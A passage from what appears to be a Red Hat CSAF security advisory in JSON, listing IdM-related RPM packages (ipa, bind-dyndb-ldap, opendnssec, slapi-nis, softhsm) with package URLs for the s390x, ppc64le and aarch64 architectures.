"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
